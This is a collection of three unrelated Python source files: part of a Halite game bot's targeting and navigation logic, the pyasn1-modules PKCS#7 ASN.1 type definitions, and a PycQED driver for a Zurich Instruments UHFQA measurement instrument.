self.update(self.map)
def passed_time_limit(self):
return (time() - self.start_of_turn) > TIME_LIMIT
def update(self, map):
self.start_of_turn = time()
self.map = map
self.turn_count += 1
# Ships (computing dx, dy, and dhealth might be a waste of time, ideally the strategy should not depend on that)
ships = self.map._all_ships()
ids = pd.Index([s.id for s in ships], name='id')
try:
old = self.ships.loc[ids]
old.index = ids
except:
old = self.ships
self.ships = pd.DataFrame(dict(
enemy=[s.owner.id != self.my_id for s in ships],
x=[s.x for s in ships],
y=[s.y for s in ships],
health=[s.health for s in ships],
docked=[s.docking_status.value != 0 for s in ships]
), index=ids)
self.full_docked = pd.Series([s.docking_status.value==2 for s in ships], index=ids)
self.ships['dx'] = self.ships.x - old.x
self.ships['dy'] = self.ships.y - old.y
self.ships['dhealth'] = self.ships.health - old.health
self.ships.fillna(0.0, inplace=True)
self.ships.sort_index(inplace=True)
# Planets
planets = self.map.all_planets()
ids = pd.Index([p.id for p in planets], name='id')
self.planets = pd.DataFrame(dict(
docks=[(p.num_docking_spots - len(p._docked_ship_ids)) if (p.owner is None or p.owner.id == self.my_id) else 0 for p in planets],
x=[p.x for p in planets],
y=[p.y for p in planets],
radius=[p.radius for p in planets],
prod=[self.full_docked.loc[p._docked_ship_ids].sum() for p in planets],
owner_id=[p.owner.id if p.owner is not None else -1 for p in planets],
), index=ids)
if not hasattr(self, 'ship_turns_till_spawn'):
self.ship_turns_till_spawn = pd.Series(12, index=self.planets.index, name='ship_turns_till_spawn')
self.ship_turns_till_spawn[self.ship_turns_till_spawn <= 0] = 12
self.ship_turns_till_spawn = self.ship_turns_till_spawn.loc[self.planets.index]
self.ship_turns_till_spawn -= self.planets['prod']
self.ship_turns_till_spawn = (self.planets['owner_id'] == self.my_id) * self.ship_turns_till_spawn + (
self.planets[
'owner_id'] != self.my_id) * 12
self.planets['turns_till_spawn'] = np.ceil(self.ship_turns_till_spawn / np.clip(self.planets['prod'], 0.001, None))
obstacles = self.ships[self.ships.docked & ~self.ships.enemy][['x', 'y']].assign(type='dock', radius=hlt.constants.SHIP_RADIUS)
obstacles = obstacles.append(self.planets[['x','y','radius']].assign(type='planet'), ignore_index=True)
self.obstacles = obstacles
if self.turn_count < 2:
if self.num_players != 2:
self.rush = False
else:
enemy_pos = self.ships[self.ships.enemy][['x','y']].mean()
my_pos = self.ships[~self.ships.enemy][['x', 'y']].mean()
v = enemy_pos - my_pos
if np.sqrt(np.square(v.x) + np.square(v.y)) < 120:
self.rush = True
else:
self.rush = False
def kamikaze(self, worker, target):
angle = int(round(np.rad2deg(np.arctan2(target.y - worker.y, target.x - worker.x))))
thrust = hlt.constants.MAX_SPEED
self.command_queue.append(('t', worker.name, thrust, angle % 360))
self.workers.drop(worker.name, inplace=True)
def special_moves(self):
# low hp kamakaze
kamikaze_workers = self.workers[(self.workers.health < 128) | (np.abs(self.workers.health / self.workers.dhealth) < 2)]
enemy_ships = self.ships[self.ships.enemy]
d = compute_distance_matrix(kamikaze_workers, enemy_ships)
sindex, tindex = np.indices(d.shape)
for _ in range(len(kamikaze_workers)):
if np.min(d) > hlt.constants.MAX_SPEED:
break
fi = np.argmin(d)
wi = sindex.flat[fi]
ti = tindex.flat[fi]
d[wi, :] = np.inf
d[:, ti] = np.inf
self.kamikaze(kamikaze_workers.iloc[wi], enemy_ships.iloc[ti])
# Other ideas:
# clumping to squads
# special opening moves (including keeping defense reserve)
# en route dodging # TODO put overlapping enemy attack zones in as obstacles
def get_targets(self):
# +0.0 each open dock
targets = list()
for pid, target in self.planets.drop('docks', axis=1).iterrows():
for _ in range(self.planets.docks.loc[pid]):
targets.append(target) # to_dict?
targets = pd.DataFrame(targets)
targets['type'] = 'open_dock'
# -30.0 enemy docks
enemy_docks = self.ships[self.ships.enemy & self.ships.docked][['x', 'y']]
enemy_docks['type'] = 'enemy_dock'
enemy_docks['radius'] = hlt.constants.SHIP_RADIUS
targets = pd.concat([targets,enemy_docks])
# -45.0 position between my dock and nearest enemy if nearest enemy is less than 30 and inbound (or less than 5 stationary) (based on threat ship count, not dock count)
threats = self.ships[self.ships.enemy & ~self.ships.docked]
my_docks = self.ships[~self.ships.enemy & self.ships.docked]
if len(threats) and len(my_docks):
dx = threats.x.values[None] - my_docks.x.values[:, None]
dy = threats.y.values[None] - my_docks.y.values[:, None]
d = np.sqrt(np.square(dx) + np.square(dy))
mask = (d < self.THREAT_CUTOFF).any(axis=0)
targeted_docks = my_docks.iloc[d.argmin(axis=0)]
targeted_docks = targeted_docks[mask]
threats = threats[mask]
if len(threats):
defense_targets = targeted_docks[['x', 'y']] + self.DEFENDER_DISTANCE * (
threats[['x', 'y']].values - targeted_docks[['x', 'y']].values) /d.min(axis=0)[mask.nonzero()[0],None]
defense_targets['radius'] = 0.0
defense_targets['type'] = 'defense'
targets = pd.concat([targets, defense_targets])
return pd.DataFrame(targets)
def send_to(self, wi, ti, min_distance=3.0, smash=False):
worker = self.workers.iloc[wi]
target = self.targets.iloc[ti]
if target['type'] == 'open_dock' and self.line_distances[wi, ti] < hlt.constants.DOCK_RADIUS:
self.command_queue.append(('d', worker.name, target.name))
if worker.name >= 0:
self.obstacles = self.obstacles.append(dict(x=worker.x, y=worker.y, radius=worker.radius, type='dock'), ignore_index=True)
return True
else:
if smash or target['type'] == 'defense':
min_distance = 0.0
d = round(min(self.line_distances[wi, ti] - min_distance, self.MAX_COLLISION_DISTANCE))
rads = self.find_clear_rads(target, worker, d)
if len(rads):
angle = int(round(np.rad2deg(rads[0])))
thrust = hlt.constants.MAX_SPEED if smash else int(round(min(d, hlt.constants.MAX_SPEED)))
thrust = max(0, thrust)
for cmd in self.command_queue:
assert cmd[1] != worker.name
self.command_queue.append(('t', worker.name, thrust, angle % 360))
if worker.name >= 0:
# add mid point obstacle # would higher res or better logic here be a significant improvement?
# x = worker.x + np.cos(rads[0]) * thrust/2
# y = worker.y + np.sin(rads[0]) * thrust/2
# self.obstacles = self.obstacles.append(dict(x=x, y=y, radius=thrust/2 + worker.radius, type='ship'), ignore_index=True)
#FIXME, testing end-only obstacles
x = worker.x + np.cos(rads[0]) * thrust
y = worker.y + np.sin(rads[0]) * thrust
self.obstacles = self.obstacles.append(dict(x=x, y=y, radius=worker.radius, type='ship'), ignore_index=True)
return True
else:
return False
def find_clear_rads(self, target, worker, d):
obstacles = self.obstacles.copy()
obstacles = obstacles[np.sqrt(np.square(obstacles.x - worker.x) + np.square(obstacles.y - worker.y)) - obstacles.radius - worker.radius <= d]
rads = (np.arctan2(target.y - worker.y, target.x - worker.x) + nav_rads)
ex = worker.x + np.cos(rads) * d
ey = worker.y + np.sin(rads) * d
for _, obstacle in obstacles.iterrows():
mask = ~intersect_segment_circle(worker, ex, ey, obstacle)
rads = rads[mask]
ex = ex[mask]
ey = ey[mask]
return rads
def update_penalties(self, wi, ti):
# Update distances here (could add penalty updates based on map and/or command_queue, e.g. additionals logic)
self.distances[wi, :] = np.inf
self.distances[:, ti] += 1000
def compute_distances(self):
# Compute distances (this could be updated with expected path distance)
dx = self.targets.x.values[None] - self.workers.x.values[:, None]
dy = self.targets.y.values[None] - self.workers.y.values[:, None]
self.line_distances = np.sqrt(np.square(dx) + np.square(dy)) - self.targets.radius.values # shouldn't need to account for ship radius
self.distances = self.line_distances.copy()
def apply_distance_penalties(self):
# for name, penalty in TYPE_PENALTY.items():
# self.distances[:, (self.targets['type'] == name).values] += penalty
self.distances[:, (self.targets['type'] == 'enemy_dock').values] += np.where(self.workers.health.values[:, None] >= 128, self.ENEMY_SHIP_PENALTY, self.LOW_HP_ENEMY_SHIP_PENALTY)
self.distances[:, (self.targets['type'] == 'defense').values] += self.DEFENSE_PENALTY * (self.workers.health.values[:, None]/255)
self.distances[self.workers.index.values < 0, :] += np.clip(7 * self.turns_till_spawn.values - 6.0, 0.0, None)[:, None]
d_center = np.sqrt(np.square(self.targets.x.values - self.map.width/2) + np.square(self.targets.y.values - self.map.height/2))
self.distances += self.D_CENTER_PENALTY * d_center
def get_rush_commands(self):
global nav_angles,nav_rads
if not hasattr(self, 'squad'):
nav_angles = np.array([-np.array(list(range(0, 175, 1))),
1 + np.array(list(range(0, 175, 1)))]).T.flatten()
nav_rads = np.deg2rad(nav_angles)
self.squad = Squad(self.ships[~self.ships.enemy].sort_values('y', ascending=False).index, scale=max(1.25, 8.5 - self.turn_count**2))
else:
# ordering = self.squad.ordering
self.squad = Squad(self.ships[~self.ships.enemy].sort_values('y', ascending=False).index, scale=max(1.25, 8.5 - self.turn_count**2))
# self.squad.ordering = ordering
pos = self.ships.loc[self.squad.member_ids][['x','y']].mean()
enemy_ships = self.ships[self.ships.enemy]
target = enemy_ships.iloc[np.argmin(np.sqrt(np.square(pos.x - enemy_ships.x.values) + np.square(pos.y-enemy_ships.y.values)))]
return self.squad.move(self, target.x, target.y)
def get_commands(self):
self.command_queue = []
if self.rush:
return self.get_rush_commands()
self.targets = self.get_targets() # df with x,y,type,radius
self.workers = self.ships[~(self.ships.enemy | self.ships.docked)]
self.special_moves() # warning, removes workers
unspawned_workers = self.planets[(self.planets.owner_id == self.my_id)].copy()
unspawned_workers.index = -(unspawned_workers.index + 1) # have negative ids
unspawned_workers['docked'] = False
unspawned_workers['enemy'] = False
unspawned_workers['health'] = 255
unspawned_workers['dx'] = 0.0
unspawned_workers['dy'] = 0.0
unspawned_workers['dhealth'] = 0.0
from_center = unspawned_workers[['x', 'y']] - np.array([self.map.width / 2, self.map.height / 2])
from_center = (
from_center.values / np.sqrt(np.square(from_center.x.values) + np.square(from_center.y.values))[:, None])
unspawned_workers[['x', 'y']] = unspawned_workers[['x', 'y']] - (
unspawned_workers.radius.values + hlt.constants.SPAWN_RADIUS)[
:, None] * from_center
self.turns_till_spawn = unspawned_workers.turns_till_spawn
self.workers = self.workers.append(unspawned_workers[self.workers.columns])
self.workers['radius'] = hlt.constants.SHIP_RADIUS
self.compute_distances() # workers X targets
self.apply_distance_penalties()
sindex, tindex = np.indices(self.distances.shape)
for _ in range(len(self.workers)):
if self.passed_time_limit() or len(self.targets) == 0 or len(self.workers) == 0:
break
fi = np.argmin(self.distances)
wi = sindex.flat[fi]
ti = tindex.flat[fi]
self.update_penalties(wi, ti)
self.send_to(wi, ti)
self.command_queue = [x for x in self.command_queue if x[1] >= 0] # filter unspawned
return [' '.join(str(x) for x in command) for command in self.command_queue]
if __name__ == '__main__':
debug = False
bot_name = 'MyBot'
game = hlt.Game(bot_name)
if not debug:
sys.stderr = open(os.devnull, mode='w') # prevent warning messages from breaking bot
bot = Bot(game)
while True:
game_map = game.update_map()
bot.update(game_map)
command_queue = bot.get_commands()
game.send_command_queue(command_queue)
else:
import pickle
bot = Bot(game)
turn_count =0
with open('{}.{}.pkl'.format(bot_name,turn_count), mode='wb') as file:
pickle.dump(bot, file)
while True:
turn_count += 1
game_map = game.update_map()
try:
bot.update(game_map)
command_queue = bot.get_commands()
with open('{}.{}.pkl'.format(bot_name,turn_count), mode='wb') as file:
pickle.dump(bot, file)
except Exception as e:
with open('{}.err.pkl'.format(bot_name), mode='wb') as file:
pickle.dump(bot, file)
raise e
game.send_command_queue(command_queue)
|
|
#
# This file is part of pyasn1-modules software.
#
# Copyright (c) 2005-2017, Ilya Etingof <etingof@gmail.com>
# License: http://pyasn1.sf.net/license.html
#
# PKCS#7 message syntax
#
# ASN.1 source from:
# https://opensource.apple.com/source/Security/Security-55179.1/libsecurity_asn1/asn1/pkcs7.asn.auto.html
#
# Sample captures from:
# openssl crl2pkcs7 -nocrl -certfile cert1.cer -out outfile.p7b
#
from pyasn1_modules.rfc2459 import *
class Attribute(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('type', AttributeType()),
namedtype.NamedType('values', univ.SetOf(componentType=AttributeValue()))
)
class AttributeValueAssertion(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('attributeType', AttributeType()),
namedtype.NamedType('attributeValue', AttributeValue())
)
pkcs_7 = univ.ObjectIdentifier('1.2.840.113549.1.7')
data = univ.ObjectIdentifier('1.2.840.113549.1.7.1')
signedData = univ.ObjectIdentifier('1.2.840.113549.1.7.2')
envelopedData = univ.ObjectIdentifier('1.2.840.113549.1.7.3')
signedAndEnvelopedData = univ.ObjectIdentifier('1.2.840.113549.1.7.4')
digestedData = univ.ObjectIdentifier('1.2.840.113549.1.7.5')
encryptedData = univ.ObjectIdentifier('1.2.840.113549.1.7.6')
class ContentType(univ.ObjectIdentifier):
pass
class ContentEncryptionAlgorithmIdentifier(AlgorithmIdentifier):
pass
class EncryptedContent(univ.OctetString):
pass
class EncryptedContentInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('contentType', ContentType()),
namedtype.NamedType('contentEncryptionAlgorithm', ContentEncryptionAlgorithmIdentifier()),
namedtype.OptionalNamedType('encryptedContent', EncryptedContent().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)))
)
class Version(univ.Integer): # overrides x509.Version
pass
class EncryptedData(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('encryptedContentInfo', EncryptedContentInfo())
)
class DigestAlgorithmIdentifier(AlgorithmIdentifier):
pass
class DigestAlgorithmIdentifiers(univ.SetOf):
componentType = DigestAlgorithmIdentifier()
class Digest(univ.OctetString):
pass
class ContentInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('contentType', ContentType()),
namedtype.OptionalNamedType('content', univ.Any().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)))
)
class DigestedData(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('digestAlgorithm', DigestAlgorithmIdentifier()),
namedtype.NamedType('contentInfo', ContentInfo()),
namedtype.NamedType('digest', Digest())
)
class IssuerAndSerialNumber(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('issuer', Name()),
namedtype.NamedType('serialNumber', CertificateSerialNumber())
)
class KeyEncryptionAlgorithmIdentifier(AlgorithmIdentifier):
pass
class EncryptedKey(univ.OctetString):
pass
class RecipientInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('issuerAndSerialNumber', IssuerAndSerialNumber()),
namedtype.NamedType('keyEncryptionAlgorithm', KeyEncryptionAlgorithmIdentifier()),
namedtype.NamedType('encryptedKey', EncryptedKey())
)
class RecipientInfos(univ.SetOf):
componentType = RecipientInfo()
class Attributes(univ.SetOf):
componentType = Attribute()
class ExtendedCertificateInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('certificate', Certificate()),
namedtype.NamedType('attributes', Attributes())
)
class SignatureAlgorithmIdentifier(AlgorithmIdentifier):
pass
class Signature(univ.BitString):
pass
class ExtendedCertificate(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('extendedCertificateInfo', ExtendedCertificateInfo()),
namedtype.NamedType('signatureAlgorithm', SignatureAlgorithmIdentifier()),
namedtype.NamedType('signature', Signature())
)
class ExtendedCertificateOrCertificate(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('certificate', Certificate()),
namedtype.NamedType('extendedCertificate', ExtendedCertificate().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)))
)
class ExtendedCertificatesAndCertificates(univ.SetOf):
componentType = ExtendedCertificateOrCertificate()
class SerialNumber(univ.Integer):
pass
class CRLEntry(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('userCertificate', SerialNumber()),
namedtype.NamedType('revocationDate', useful.UTCTime())
)
class TBSCertificateRevocationList(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('signature', AlgorithmIdentifier()),
namedtype.NamedType('issuer', Name()),
namedtype.NamedType('lastUpdate', useful.UTCTime()),
namedtype.NamedType('nextUpdate', useful.UTCTime()),
namedtype.OptionalNamedType('revokedCertificates', univ.SequenceOf(componentType=CRLEntry()))
)
class CertificateRevocationList(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('tbsCertificateRevocationList', TBSCertificateRevocationList()),
namedtype.NamedType('signatureAlgorithm', AlgorithmIdentifier()),
namedtype.NamedType('signature', univ.BitString())
)
class CertificateRevocationLists(univ.SetOf):
componentType = CertificateRevocationList()
class DigestEncryptionAlgorithmIdentifier(AlgorithmIdentifier):
pass
class EncryptedDigest(univ.OctetString):
pass
class SignerInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('issuerAndSerialNumber', IssuerAndSerialNumber()),
namedtype.NamedType('digestAlgorithm', DigestAlgorithmIdentifier()),
namedtype.OptionalNamedType('authenticatedAttributes', Attributes().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.NamedType('digestEncryptionAlgorithm', DigestEncryptionAlgorithmIdentifier()),
namedtype.NamedType('encryptedDigest', EncryptedDigest()),
namedtype.OptionalNamedType('unauthenticatedAttributes', Attributes().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)))
)
class SignerInfos(univ.SetOf):
componentType = SignerInfo()
class SignedAndEnvelopedData(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('recipientInfos', RecipientInfos()),
namedtype.NamedType('digestAlgorithms', DigestAlgorithmIdentifiers()),
namedtype.NamedType('encryptedContentInfo', EncryptedContentInfo()),
namedtype.OptionalNamedType('certificates', ExtendedCertificatesAndCertificates().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('crls', CertificateRevocationLists().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1))),
namedtype.NamedType('signerInfos', SignerInfos())
)
class EnvelopedData(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('recipientInfos', RecipientInfos()),
namedtype.NamedType('encryptedContentInfo', EncryptedContentInfo())
)
class DigestInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('digestAlgorithm', DigestAlgorithmIdentifier()),
namedtype.NamedType('digest', Digest())
)
class SignedData(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('digestAlgorithms', DigestAlgorithmIdentifiers()),
namedtype.NamedType('contentInfo', ContentInfo()),
namedtype.OptionalNamedType('certificates', ExtendedCertificatesAndCertificates().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('crls', CertificateRevocationLists().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1))),
namedtype.NamedType('signerInfos', SignerInfos())
)
class Data(univ.OctetString):
pass
|
|
"""
Base driver for the UHFQA instrument including all common functionality.
Application dependent code can be found in the UHFQuantumController and in the
UHFQA_qudev modules.
"""
import time
import logging
import numpy as np
import pycqed.instrument_drivers.physical_instruments.ZurichInstruments.ZI_base_instrument as zibase
from pycqed.utilities.general import check_keyboard_interrupt
from qcodes.utils import validators
from qcodes.instrument.parameter import ManualParameter
log = logging.getLogger(__name__)
##########################################################################
# Exceptions
##########################################################################
class ziUHFQCSeqCError(Exception):
"""Exception raised when the configured SeqC program does
not match the structure needed for a given measurement in terms
of number of samples, number of averages or the use of a delay."""
pass
class ziUHFQCHoldoffError(Exception):
"""Exception raised when a holdoff error has occurred in either the
input monitor or result logging unit. Increase the delay between triggers
sent to these units to solve the problem."""
pass
class ziUHFQCDIOActivityError(Exception):
"""Exception raised when insufficient activity is detected on the bits
of the DIO to be used for controlling which qubits to measure."""
pass
class ziUHFQCDIOCalibrationError(Exception):
"""Exception raised when the DIO calibration fails, meaning no signal
delay can be found where no timing violations are detected."""
pass
##########################################################################
# Class
##########################################################################
class UHFQA_core(zibase.ZI_base_instrument):
"""
This is the base PycQED driver for the 1.8 Gsample/s UHFQA developed
by Zurich Instruments. The class implements functionality that os
by both the DCL and QuDev versions of the UHFQA driver.
Requirements:
Installation instructions for Zurich Instrument Libraries.
1. install ziPython 3.5/3.6 ucs4 19.05 for 64bit Windows from
http://www.zhinst.com/downloads, https://people.zhinst.com/~niels/
2. upload the latest firmware to the UHFQA using the LabOne GUI
"""
# Define minimum required revisions
MIN_FWREVISION = 63210
MIN_FPGAREVISION = 63133
# Define user registers
USER_REG_LOOP_CNT = 0
USER_REG_RO_MODE = 1
USER_REG_WAIT_DLY = 2
USER_REG_AVG_CNT = 3
USER_REG_ERR_CNT = 4
def __init__(self,
name,
device: str,
interface: str = 'USB',
address: str = '127.0.0.1',
port: int = 8004,
nr_integration_channels: int = 10,
server: str = '',
**kw) -> None:
"""
Input arguments:
name: (str) name of the instrument
device (str) the name of the device e.g., "dev8008"
interface (str) the name of the interface to use ('1GbE' or 'USB')
address (str) the host where the ziDataServer is running (for compatibility)
port (int) the port to connect to for the ziDataServer (don't change)
nr_integration_channels (int) the number of integration channels to use (max 10)
server: (str) the host where the ziDataServer is running (if not '' then used instead of address)
"""
t0 = time.time()
# Override server with the old-style address argument
if server == '':
server = address
# save some parameters
self._nr_integration_channels = nr_integration_channels
# Used for keeping track of which nodes we are monitoring for data
self._acquisition_nodes = []
# The following members define the characteristics of the configured
# AWG program
self._reset_awg_program_features()
# Define parameters that should not be part of the snapshot
self._params_to_exclude = set(['features_code', 'system_fwlog', 'system_fwlogenable'])
# Set default waveform length to 20 ns at 1.8 GSa/s
self._default_waveform_length = 32
# Our base class includes all the functionality needed to initialize the parameters
# of the object. Those parameters are read from instrument-specific JSON files stored
# in the zi_parameter_files folder.
super().__init__(name=name, device=device, interface=interface,
server=server, port=port, num_codewords=2**nr_integration_channels,
**kw)
t1 = time.time()
log.info(f'{self.devname}: Initialized UHFQA_core in {t1 - t0:.3f}s')
##########################################################################
# Overriding private ZI_base_instrument methods
##########################################################################
def _check_devtype(self) -> None:
if self.devtype != 'UHFQA':
raise zibase.ziDeviceError(
'Device {} of type {} is not a UHFQA instrument!'.format(self.devname, self.devtype))
def _check_options(self) -> None:
"""
Checks that the correct options are installed on the instrument.
"""
options = self.gets('features/options').split('\n')
if 'QA' not in options and 'QC' not in options:
raise zibase.ziOptionsError(
'Device {} is missing the QA or QC option!'.format(self.devname))
if 'AWG' not in options:
raise zibase.ziOptionsError(
'Device {} is missing the AWG option!'.format(self.devname))
def _check_versions(self) -> None:
"""
Checks that sufficient versions of the firmware are available.
"""
if self.geti('system/fwrevision') < UHFQA_core.MIN_FWREVISION:
raise zibase.ziVersionError('Insufficient firmware revision detected! Need {}, got {}!'.format(
UHFQA_core.MIN_FWREVISION, self.geti('system/fwrevision')))
if self.geti('system/fpgarevision') < UHFQA_core.MIN_FPGAREVISION:
raise zibase.ziVersionError('Insufficient FPGA revision detected! Need {}, got {}!'.format(
UHFQA_core.MIN_FPGAREVISION, self.geti('system/fpgarevision')))
def _check_awg_nr(self, awg_nr) -> None:
"""
Checks that the given AWG index is valid for the device.
"""
if (awg_nr != 0):
raise zibase.ziValueError(
'Invalid AWG index of {} detected!'.format(awg_nr))
def _num_channels(self) -> int:
return 2
def _add_extra_parameters(self) -> None:
"""
We add a few additional custom parameters on top of the ones defined in the device files. These are:
qas_0_trans_offset_weightfunction - an offset correction parameter for all weight functions,
this allows normalized calibration when performing cross-talk suppressed readout. The parameter
is not actually used in this driver, but in some of the support classes that make use of the driver.
"""
super()._add_extra_parameters()
# storing an offset correction parameter for all weight functions,
# this allows normalized calibration when performing cross-talk suppressed
# readout
for i in range(self._nr_integration_channels):
self.add_parameter(
"qas_0_trans_offset_weightfunction_{}".format(i),
unit='', # unit is adc value
label='RO normalization offset',
initial_value=0.0,
docstring='an offset correction parameter for all weight functions, '
'this allows normalized calibration when performing cross-talk suppressed readout. The parameter '
'is not actually used in this driver, but in some of the support classes that make use of the driver.',
parameter_class=ManualParameter)
self.add_parameter(
'wait_dly',
set_cmd=self._set_wait_dly,
get_cmd=self._get_wait_dly,
unit='',
label='AWG cycle delay',
docstring='Configures a delay in AWG clocks cycles (4.44 ns) to be '
'applied between when the AWG starts playing the readout waveform, and when it triggers the '
'actual readout.',
vals=validators.Ints())
self.add_parameter(
'minimum_holdoff',
get_cmd=self._get_minimum_holdoff,
unit='s',
label='Minimum hold-off',
docstring='Returns the minimum allowed hold-off between two readout operations.',
vals=validators.Numbers())
##########################################################################
# 'public' overrides for ZI_base_instrument
##########################################################################
def assure_ext_clock(self) -> None:
"""
Make sure the instrument is using an external reference clock
"""
# get source:
# 1: external
# 0: internal (commanded so, or because of failure to sync to external clock)
source = self.system_extclk()
if source == 1:
return
log.info(f"{self.devname}: Switching to external clock.")
while True:
self.system_extclk(1)
timeout = 10
while timeout > 0:
time.sleep(0.1)
status = self.system_extclk()
if status == 1: # synced
break
else: # sync failed
timeout -= 0.1
if self.system_extclk() != 1:
log.warning(f"{self.devname}: Switching to external clock failed. Trying again.")
else:
break
log.info(f"{self.devname}: Switching to external clock done.")
def clear_errors(self) -> None:
super().clear_errors()
self.qas_0_result_reset(1)
self.qas_0_monitor_reset(1)
def load_default_settings(self) -> None:
# standard configurations adapted from Haandbaek's notebook
# Setting the clock to external
self.assure_ext_clock()
# Turn on both outputs
self.sigouts_0_on(1)
self.sigouts_1_on(1)
# Set the output channels to 50 ohm
self.sigouts_0_imp50(True)
self.sigouts_1_imp50(True)
# Configure the analog trigger input 1 of the AWG to assert on a rising
# edge on Ref_Trigger 1 (front-panel of the instrument)
self.awgs_0_triggers_0_rising(1)
self.awgs_0_triggers_0_level(0.000000000)
self.awgs_0_triggers_0_channel(2)
# Configure the digital trigger to be a rising-edge trigger
self.awgs_0_auxtriggers_0_slope(1)
# Straight connection, signal input 1 to channel 1, signal input 2 to
# channel 2
self.qas_0_deskew_rows_0_cols_0(1.0)
self.qas_0_deskew_rows_0_cols_1(0.0)
self.qas_0_deskew_rows_1_cols_0(0.0)
self.qas_0_deskew_rows_1_cols_1(1.0)
# Configure the result logger to not do any averaging
self.qas_0_result_length(1000)
self.qas_0_result_averages(pow(2, 10))
# result_logging_mode 2 => raw (IQ)
self.qas_0_result_source(2) # FIXME: not documented in "node_doc_UHFQA.json"
self.reset_acquisition_params()
# The custom firmware will feed through the signals on Signal Input 1 to Signal Output 1 and Signal Input 2 to Signal Output 2
# when the AWG is OFF. For most practical applications this is not really useful. We, therefore, disable the generation of
# these signals on the output here.
self.sigouts_0_enables_0(0)
self.sigouts_0_enables_1(0)
self.sigouts_1_enables_0(0)
self.sigouts_1_enables_1(0)
##########################################################################
# 'public' functions
##########################################################################
def clock_freq(self):
return 1.8e9
##########################################################################
# 'public' functions: utility
##########################################################################
def reset_acquisition_params(self):
log.info(f'{self.devname}: Setting user registers to 0')
for i in range(16):
self.set('awgs_0_userregs_{}'.format(i), 0)
self.reset_crosstalk_matrix()
self.reset_correlation_params()
self.reset_rotation_params()
def reset_crosstalk_matrix(self):
self.upload_crosstalk_matrix(np.eye(self._nr_integration_channels))
def reset_correlation_params(self):
for i in range(self._nr_integration_channels):
self.set('qas_0_correlations_{}_enable'.format(i), 0)
self.set('qas_0_correlations_{}_source'.format(i), 0)
self.set('qas_0_thresholds_{}_correlation_enable'.format(i), 0)
self.set('qas_0_thresholds_{}_correlation_source'.format(i), 0)
def reset_rotation_params(self):
for i in range(self._nr_integration_channels):
self.set('qas_0_rotations_{}'.format(i), 1+1j)
def upload_crosstalk_matrix(self, matrix) -> None:
"""
Upload parameters for the 10*10 crosstalk suppression matrix.
This method uses the 'qas_0_crosstalk_rows_*_cols_*' nodes.
"""
for i in range(np.shape(matrix)[0]): # looping over the rows
for j in range(np.shape(matrix)[1]): # looping over the colums
self.set('qas_0_crosstalk_rows_{}_cols_{}'.format(
j, i), matrix[i][j])
def download_crosstalk_matrix(self, nr_rows=10, nr_cols=10):
"""
Upload parameters for the 10*10 crosstalk suppression matrix.
This method uses the 'qas_0_crosstalk_rows_*_cols_*' nodes.
"""
matrix = np.zeros([nr_rows, nr_cols])
for i in range(np.shape(matrix)[0]): # looping over the rows
for j in range(np.shape(matrix)[1]): # looping over the colums
matrix[i][j] = self.get(
'qas_0_crosstalk_rows_{}_cols_{}'.format(j, i))
return matrix
##########################################################################
# 'public' functions: print overview helpers
##########################################################################
def print_correlation_overview(self) -> None:
msg = '\tCorrelations overview \n'
for i in range(10):
enabled = self.get('qas_0_correlations_{}_enable'.format(i))
source = self.get('qas_0_correlations_{}_source'.format(i))
msg += "Correlations {}, enabled: {} \tsource: {}\n".format(
i, enabled, source)
msg += '\n\tThresholded correlations overview \n'
for i in range(10):
enabled = self.get(
'qas_0_thresholds_{}_correlation_enable'.format(i))
source = self.get(
'qas_0_thresholds_{}_correlation_source'.format(i))
msg += "Thresholds correlation {}, enabled: {} \tsource: {}\n".format(
i, enabled, source)
print(msg)
def print_deskew_overview(self) -> None:
msg = '\tDeskew overview \n'
deskew_mat = np.zeros((2, 2))
for i in range(2):
for j in range(2):
deskew_mat[i, j] = self.get(
'qas_0_deskew_rows_{}_cols_{}'.format(i, j))
msg += 'Deskew matrix: \n'
msg += str(deskew_mat)
print(msg)
def print_crosstalk_overview(self) -> None:
msg = '\tCrosstalk overview \n'
msg += 'Bypass crosstalk: {} \n'.format(self.qas_0_crosstalk_bypass())
crosstalk_mat = np.zeros((10, 10))
for i in range(10):
for j in range(10):
crosstalk_mat[i, j] = self.get(
'qas_0_crosstalk_rows_{}_cols_{}'.format(i, j))
msg += 'Crosstalk matrix: \n'
print(msg)
print(crosstalk_mat)
